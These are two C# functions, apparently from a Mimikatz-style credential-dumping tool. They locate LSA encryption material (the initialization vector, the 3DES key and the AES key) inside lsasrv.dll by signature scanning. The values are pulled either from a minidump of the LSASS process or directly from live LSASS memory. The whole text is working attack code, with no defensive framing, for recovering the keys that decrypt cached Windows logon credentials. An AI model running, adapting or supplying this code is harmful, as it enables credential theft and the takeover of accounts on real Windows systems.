public static byte[] get_des_key(Program.MiniDump minidump, long pos, lsaTemplate_NT6.LsaTemplate_NT6 template) { ///Console.WriteLine("Acquireing DES key..."); long offset = (pos + template.key_pattern.offset_to_DES_key_ptr); long ptr_iv = (long)Helpers.get_ptr_with_offset(minidump.fileBinaryReader, (long)offset, minidump.sysinfo); minidump.fileBinaryReader.BaseStream.Seek(ptr_iv, 0); ptr_iv = (long)Minidump.Helpers.ReadUInt64(minidump.fileBinaryReader); ptr_iv = Helpers.Rva2offset(minidump, ptr_iv); minidump.fileBinaryReader.BaseStream.Seek(ptr_iv, 0); byte[] h3DesKeyBytes = minidump.fileBinaryReader.ReadBytes(Marshal.SizeOf(typeof(KIWI_BCRYPT_HANDLE_KEY))); KIWI_BCRYPT_HANDLE_KEY h3DesKey = Helpers.ReadStruct <KIWI_BCRYPT_HANDLE_KEY>(h3DesKeyBytes); byte[] extracted3DesKeyByte = minidump.fileBinaryReader.ReadBytes(Marshal.SizeOf(typeof(KIWI_BCRYPT_KEY81))); KIWI_BCRYPT_KEY81 extracted3DesKey = Helpers.ReadStruct <KIWI_BCRYPT_KEY81>(extracted3DesKeyByte); return(extracted3DesKey.hardkey.data.Take(24).ToArray()); }
private int FindKeys(IntPtr hLsass, IntPtr lsasrvMem, OSVersionHelper oshelper) { long keySigOffset = 0; long ivOffset = 0; long desOffset = 0, aesOffset = 0; KIWI_BCRYPT_HANDLE_KEY h3DesKey = new KIWI_BCRYPT_HANDLE_KEY(); KIWI_BCRYPT_HANDLE_KEY hAesKey = new KIWI_BCRYPT_HANDLE_KEY(); KIWI_BCRYPT_KEY81 extracted3DesKey, extractedAesKey; IntPtr keyPointer = IntPtr.Zero; // Search for AES/3Des/IV signature within lsasrv.dll and grab the offset keySigOffset = (long)Utility.OffsetFromSign("lsasrv.dll", oshelper.keyIVSig, max_search_size); if (keySigOffset == 0) { Console.WriteLine("[x] Error: Could not find offset to AES/3Des/IV keys\n"); return(1); } // Retrieve offset to InitializationVector address due to "lea reg, [InitializationVector]" instruction IntPtr tmp_p = IntPtr.Add(lsasrvMem, (int)keySigOffset + (int)oshelper.IV_OFFSET); byte[] ivOffsetBytes = Utility.ReadFromLsass(ref hLsass, tmp_p, 4); ivOffset = BitConverter.ToInt32(ivOffsetBytes, 0); tmp_p = IntPtr.Add(lsasrvMem, (int)keySigOffset + (int)oshelper.IV_OFFSET + 4 + (int)ivOffset); // Read InitializationVector (16 bytes) this.iv = Utility.ReadFromLsass(ref hLsass, tmp_p, 16); tmp_p = IntPtr.Add(lsasrvMem, (int)keySigOffset + (int)oshelper.DES_OFFSET); // Retrieve offset to h3DesKey address due to "lea reg, [h3DesKey]" instruction byte[] desOffsetBytes = Utility.ReadFromLsass(ref hLsass, tmp_p, 4); desOffset = BitConverter.ToInt32(desOffsetBytes, 0); tmp_p = IntPtr.Add(lsasrvMem, (int)keySigOffset + (int)oshelper.DES_OFFSET + 4 + (int)desOffset); // Retrieve pointer to h3DesKey which is actually a pointer to KIWI_BCRYPT_HANDLE_KEY struct byte[] keyPointerBytes = Utility.ReadFromLsass(ref hLsass, tmp_p, 8); long keyPointerInt = BitConverter.ToInt64(keyPointerBytes, 0); // Read the KIWI_BCRYPT_HANDLE_KEY struct from lsass byte[] h3DesKeyBytes = Utility.ReadFromLsass(ref hLsass, new IntPtr(keyPointerInt), Convert.ToUInt64(Marshal.SizeOf(typeof(KIWI_BCRYPT_HANDLE_KEY)))); h3DesKey = Utility.ReadStruct <KIWI_BCRYPT_HANDLE_KEY>(h3DesKeyBytes); // Read in the 3DES key byte[] extracted3DesKeyByte = Utility.ReadFromLsass(ref hLsass, h3DesKey.key, Convert.ToUInt64(Marshal.SizeOf(typeof(KIWI_BCRYPT_KEY81)))); extracted3DesKey = Utility.ReadStruct <KIWI_BCRYPT_KEY81>(extracted3DesKeyByte); this.deskey = extracted3DesKey.hardkey.data; tmp_p = IntPtr.Add(lsasrvMem, (int)keySigOffset + (int)oshelper.AES_OFFSET); // Retrieve offset to hAesKey address due to "lea reg, [hAesKey]" instruction byte[] aesOffsetBytes = Utility.ReadFromLsass(ref hLsass, tmp_p, 4); aesOffset = BitConverter.ToUInt32(aesOffsetBytes, 0); tmp_p = IntPtr.Add(lsasrvMem, (int)keySigOffset + (int)oshelper.AES_OFFSET + 4 + (int)aesOffset); // Retrieve pointer to h3DesKey which is actually a pointer to KIWI_BCRYPT_HANDLE_KEY struct keyPointerBytes = Utility.ReadFromLsass(ref hLsass, tmp_p, 8); keyPointerInt = BitConverter.ToInt64(keyPointerBytes, 0); // Read the KIWI_BCRYPT_HANDLE_KEY struct from lsass byte[] hAesKeyBytes = Utility.ReadFromLsass(ref hLsass, new IntPtr(keyPointerInt), Convert.ToUInt64(Marshal.SizeOf(typeof(KIWI_BCRYPT_HANDLE_KEY)))); hAesKey = Utility.ReadStruct <KIWI_BCRYPT_HANDLE_KEY>(hAesKeyBytes); // Read in AES key byte[] extractedAesKeyBytes = Utility.ReadFromLsass(ref hLsass, hAesKey.key, Convert.ToUInt64(Marshal.SizeOf(typeof(KIWI_BCRYPT_KEY81)))); extractedAesKey = Utility.ReadStruct <KIWI_BCRYPT_KEY81>(extractedAesKeyBytes); this.aeskey = extractedAesKey.hardkey.data; return(0); }